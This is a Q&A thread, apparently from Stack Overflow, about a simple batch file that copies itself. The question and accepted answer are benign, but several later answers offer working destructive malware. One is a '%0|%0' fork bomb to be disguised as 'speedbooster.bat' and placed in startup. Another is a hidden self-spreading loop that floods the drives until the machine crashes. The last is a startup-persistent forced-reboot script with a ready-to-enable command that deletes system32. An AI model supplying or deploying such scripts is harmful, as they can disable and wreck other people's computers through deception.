# Very basic batch self-replicating code: how dangerous?

Tags: batch-file, self-reference

After reading a bit too much about von Neumann self-replicating machines, I decided to tinker a bit with batch, trying to make a simple file that would make a copy of itself upon running.
I ended up with this:

```
set self=%~n0
REM get own filename
TYPE %self%.bat > %self%E.bat
```

The file is saved as WEE.bat and each run of the latest iteration makes a copy with an additional E.

It is very simple to add a simple line to automaticaly run the latest iteration, and at this point I actually have no idea what happens: Does something keep my computer to try to overflow its own drive? with the "improvement", how different would this piece of code be from an actual malware (besides the obvious spreading through network thing)?

Comment: Why don't you try to run it and see what happens?

Comment: Precisely because I don't want to end up with a self-replication script getting out of hand.

Comment: Put a limit on it before you run.

Comment: `Does something keep my computer to try to overflow its own drive?`

The max length of a command that can be executed in command prompt is 8191 characters. So after reaching it with the replication it wont be able to do it more

 `With the "improvement", how different would this piece of code be from an actual malware (besides the obvious spreading through network thing)?`

What "improvement"? You gave no mode details so nobody could know. Are stealing any resources besides the diskspace ?

Comment: @npocmaka By improvement, I simply meant a line like: %self%E.bat at the end, executing the new iteration. Also thanks for the info about the character limit. But then what if I simply start a new prompt each time? Or made it so the thing still worked without extending the name?

Answer (score 1, accepted):

> Does something keep my computer to try to overflow its own drive? with the "improvement", how different would this piece of code be from an actual malware (besides the obvious spreading through network thing)?

No. If you instruct your computer to do something useless or detrimental it will do so.  The only limiting factor here is that with echo enabled, every line of execution must be spewed to the console window, so it's not going to be terribly fast. You'll have a chance to kill it with Ctrl-C, but its going to create thousands of files until the file name is too long to invoke, at which point it will fail.  Most hard drives have orders of magnitude more space on them than your script could possibly fill-up.

If you want to experiment, see `timeout /?`.  Add a timeout of five or ten seconds for each run of the script and you can see the number of files increasing in whatever directory you run the batch file in.

EDIT:

It appears the limiting factor here is the file path/name length at 270 characters.

```
>type D:\TMP\Joseph\testeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee.cmd  1>D:\TMP\Joseph\testeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee.cmd
The filename, directory name, or volume label syntax is incorrect.

>D:\TMP\Joseph\testeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee.cmd
The parameter is incorrect.
```

Answer (score 1):

I improved the script.
It works

```
@echo off
set self=%~n0
REM get own filename
TYPE %self%.bat > %self%a.bat
%self%a.bat
```

Answer (score 1):

```
%0|%0
```

Just type it and save it on the desktop of your PC. (Eg - speedbooster.bat) once you click it, it will slow down your PC within a few seconds, and you will have to switch off the PC from the power cable and start it to fix it. You can et it for the startup folder to crash the pc forever (It can be fixed via Boot menu i think)

Answer (score 0):

```
@echo off
move WEE.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /y
attrib +s +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WEE.bat"
:1
echo %random%xd%random%lol >> C:\%random%xd%random%lol.txt
copy WEE.bat C:\%random%xd%random%lol /y
copy WEE.bat D:\%random%xd%random%lol /y
copy WEE.bat C:\lol%random%xd%random% /y
copy WEE.bat D:\lol%random%xd%random% /y
echo %random%xd%random%lol >> C:\%random%xd%random%lol.txt
open C:\%random%xd%random%lol\WEE.bat
open D:\%random%xd%random%lol\WEE.bat
open C:\lol%random%xd%random%\WEE.bat
open D:\lol%random%xd%random%\WEE.bat
echo %random%xd%random%lol >> C:\%random%xd%random%lol.txt
start "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WEE.bat"
goto :1
```

they will replicate and open itself and each other a lot even on device startup (although there is a way to get around that). the device should crash pretty quickly.

Answer (score 0):

I work with those kinds of viruses all the time! it's really easy tho.

```
@echo off
color 02
title virus
cls
set self=%~n0
::thx for the code bro!

:loop
copy "%cd%\%self%.*" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\%self%%random%%random%.bat"
::this will copy it to the startup directory so it will open it when you start up

::virus code here. (like delete system32)
::here's the code for that:
::takeown /f "%windir%\system32" & del /Q /F /S "%windir%\system32"

shutdown /f /r /t 0
exit
```

well,  thats the virus ^
have fun!
(the delete system32 code is optional, you can remove the "::" to activate the code)